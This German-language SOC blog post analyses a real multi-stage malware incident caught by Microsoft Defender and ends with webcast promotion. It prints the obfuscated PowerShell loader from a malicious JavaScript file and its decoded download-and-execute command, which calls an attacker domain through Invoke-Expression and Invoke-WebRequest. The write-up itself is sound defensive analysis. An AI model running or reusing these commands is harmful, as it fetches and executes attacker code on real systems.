Cyberangriff Beispiel – detaillierte Analyse eines echten Angriffs
Cyberangriffe werden immer raffinierter, Unternehmen stehen vor der Herausforderung, Sicherheitsvorfälle frühzeitig zu erkennen und zu stoppen. Oftmals bleibt eine Kompromittierung unentdeckt, bis bereits sensible Daten abgeflossen oder Systeme nicht mehr funktionsfähig sind. Aber wie können Sie verhindern, dass ein einzelner Angriff Ihr gesamtes Netzwerk gefährdet? Hier kommt ein Security Operations Center (SOC) ins Spiel: Ein SOC analysiert verdächtige Aktivitäten in Echtzeit, erkennt Bedrohungen und reagiert sofort. Ohne ein solches Überwachungs- und Abwehrzentrum bleiben viele Cyberangriffe zu lange unbemerkt – mit potenziell schwerwiegenden Folgen. In diesem Artikel zeigen wir anhand eines realen Vorfalls, wie ein SOC Angriffe einstuft und welche Maßnahmen helfen, Ihr Unternehmen nachhaltig zu schützen.
Der Vorfall: Multi-Stage Cyberangriff über JavaScript Datei
Der Vorfall begann mit einer Microsoft Defender Alarmierung durch einen gruppierten „Multi-Stage“ Incident, der häufig in Verbindung mit bekannten Angriffstaktiken gemeldet wird. Das Defender Portal wies auf einen auffälligen JavaScript-Prozess hin, der vermutlich bekannte Techniken zur Datenexfiltration über Windows Management Instrumentation (WMI) und PowerShell genutzt hat.
Erste Reaktion: Isolierung des betroffenen Endpunkts
Unser SOC-Team erkannte die Bedrohung sofort und isolierte sowohl das betroffene Gerät als auch den zugehörigen Benutzer. Damit wurde ein möglicher Command-and-Control (C&C)-Zugriff verhindert und eine weitere Verbreitung im Unternehmensnetzwerk unterbunden.
Forensische Analyse: verdächtiger PowerShell-Befehl
Der zugehörige „Suspicious PowerShell command line“-Alert im Defender Portal wird ausgelöst, wenn PowerShell-Befehle an einem Endpunkt ausgeführt werden, die der Defender nicht klar als ungefährlich einstufen kann. Der Alert enthielt im konkreten Beispiel folgenden PowerShell-Befehl:
c$($ohzytakfucrqdn)l;$ivudkpgm=(8102,8107,8110,8113,8103,8097,8104,8096,8093,8099,8107,8104,8042,8111,8101,8112,8097,8043,8045,8042,8108,8100,8108,8059,8111,8057,8098,8104,8101,8094,8093,8094,8095,8046,8046);$fuhdbmyvr=('ertigos','get-cmdlet');$ciftrhqj=$ivudkpgm;foreach($fgjnayi in $ciftrhqj){$evyfqhbualdicz=$fgjnayi;$mauvkg=$mauvkg+[char]($evyfqhbualdicz-7996);$rsawxqnd=$mauvkg; $acbjzwrfqoekh=$rsawxqnd};$kpjqtosvig[2]=$acbjzwrfqoekh;$bslzrfkmvgwy='rl';$cwtglzv=1;.$([char](((200 + 30) - (100 + 25)))+'ex')(protons -useb $acbjzwrfqoekh)
Aus der Beweismenge des Defenders luden wir uns die originale JavaScript-Datei herunter. Auch in dieser vollzogen wir das Vorgehen des Programms nach und konnten denselben PowerShell-Codeblock extrahieren.
Der decodierte Codeabschnitt beinhaltet eine PowerShell-Code-Ausführung über WMI Tools – eine bekannte Technik zur Umgehung von Sicherheitsmechanismen. Microsoft Defender hatte dies korrekt erkannt und entsprechend Alarm geschlagen.
Aufdeckung der eigentlichen Payload
Durch eine schrittweise Entschlüsselung des Codes extrahierten wir den eigentlichen Angriffsbefehl:
.$(iex curl -useb jorukeldagol.site/1.php?s=flibabc22)
Die Auflösung der Abkürzungen ergab:
Invoke-Expression (Invoke-WebRequest -UseBasicParsing -Uri "http://jorukeldagol.site/1.php?s=flibabc22")
Dies bedeutet, dass die PowerShell-Ausführung externen Code von einer nicht vertrauenswürdigen Quelle herunterlud und ausführte – ein klares Indiz für eine Kompromittierung. Zudem fand der Zugriff unverschlüsselt über http statt, was ebenfalls ein Indiz für einen bösartigen Akteur darstellt. Den Internetzugriff vollzogen wir auch im Defender im Advanced Hunting nach:
Hinter der URL befand sich folgender Code im Klartext (Abbildung 1 unten). Auch dieser Code ist stark verschleiert. Unsere Analyse zeigte, dass erneut ein „Invoke-Expression“-Befehl ausgeführt wurde, gefolgt von folgendem weiteren Code (Abbildung 2). Entwickler erkennen hier bereits ein deutlich klareres Muster als in den vorherigen Codeblöcken. Unsere Analyse führte zudem zu einer leserlichen Variante des Codes (Abbildung 3).
Hier zeigt sich, dass der Schadcode verschiedene Systemspezifikationen ausliest, offenbar um sein Verhalten an die Umgebung anzupassen. Dazu gehören Abfragen, ob das System in einer virtuellen Maschine läuft oder welcher Grafikkarten-Typ genutzt wird. Diese Technik wird oft verwendet, um Sicherheitsanalysen in Sandbox-Umgebungen zu umgehen. Zusätzlich wurde der Cache-Speicher überprüft, vermutlich um weitere Unterscheidungsmerkmale des Systems zu erfassen.
Die gesammelten Systeminformationen fließen in die Generierung einer spezifischen URL ein, die anschließend für die Ausführung eines weiteren Invoke-Expression-Befehls genutzt wird. Dies deutet darauf hin, dass basierend auf den ermittelten Parametern eine für das jeweilige System optimierte Schadsoftware nachgeladen wird. Dieses Vorgehen ermöglicht es dem Angreifer, gezielt zwischen verschiedenen Payloads zu wählen, etwa um Erkennung durch Sicherheitslösungen zu umgehen oder Funktionen an die Systemumgebung anzupassen.
Blockierung und Schadensbegrenzung
Entscheidend war anschließend der proaktive Netzwerkschutz durch den Defender, der den Zugriff auf die generierte URL blockierte. Damit verhinderte dieser die Ausführung weiterer bösartiger Befehle. Auch dies lässt sich über die gemeldeten Aktionen nachvollziehen:
Ein Analysieren der folgenden Geräteaktionen, einsehbar durch die Defender Device Timeline, bestätigte, dass nach dieser Blockierung keine weiteren PowerShell-Aktivitäten stattfanden. Der fehlgeschlagene Zugriff auf die URL führte zur Beendigung der Malware, die keine weiteren Elemente enthielt.
Um jegliches Restrisiko zu eliminieren, setzten wir den betroffenen Endpunkt vollständig zurück. So stellten wir sicher, dass keine Fragmente des Angriffs auf dem System verbleiben oder in der Analyse übersehen werden. Dank zentraler Datenhaltung in SharePoint war ein Datenverlust nicht zu befürchten, und das Gerät konnte nach einer Neuinstallation sicher in die IT-Umgebung zurückgeführt werden.
Präventive Maßnahmen: Cyberangriffen vorbeugen
Zur Minimierung zukünftiger Angriffsrisiken empfehlen wir unseren Kunden folgende Maßnahmen:
Fazit
Dieser Vorfall zeigt, wie wichtig ein Security Operations Center im Zusammenspiel mit einer gut konfigurierten Sicherheitsumgebung ist, um Angriffe frühzeitig zu erkennen und zu unterbinden. Microsoft Defender hat dank der richtigen Konfiguration zuverlässig Alarm geschlagen und den Cyberangriff letztendlich erfolgreich gestoppt.
Die kontinuierliche Überwachung der Sicherheitsereignisse durch ein SOC und die fortlaufende Weiterentwicklung der Sicherheitsmaßnahmen ist essenziell, da Angreifer ihre Methoden ständig anpassen. Ein mehrschichtiger Schutzansatz mit präventiven, detektiven und reaktiven Maßnahmen ist daher unerlässlich, um moderne Bedrohungen effizient abzuwehren.
Kostenfreie Webcasts für mehr IT-Sicherheit
Unsere Security Webcasts liefern Ihnen praxisnahe Einblicke und Best Practices rund um die moderne IT-Sicherheit mit Microsoft-Technologien – direkt von unseren Experten:
09.05.25 Phishingresistente Authentifizierung
Der Weg zu einer passwortlosen Zukunft mit MFA, Windows Hello und FIDO – sicher und benutzerfreundlich.
16.05.25 Firewall ade
Warum klassische Firewalls nicht mehr reichen – und wie Sie mit Zero Trust eine moderne, netzwerkunabhängige Sicherheitsarchitektur ermöglichen.
06.06.25 Effizientes Mobile Device Management (MDM) mit Microsoft Intune
iOS & Android sicher und compliant verwalten – ohne Produktivitätsverlust.
Melden Sie sich jetzt an und stärken Sie Ihre Cyberabwehr:
Weitere News zu diesem Thema
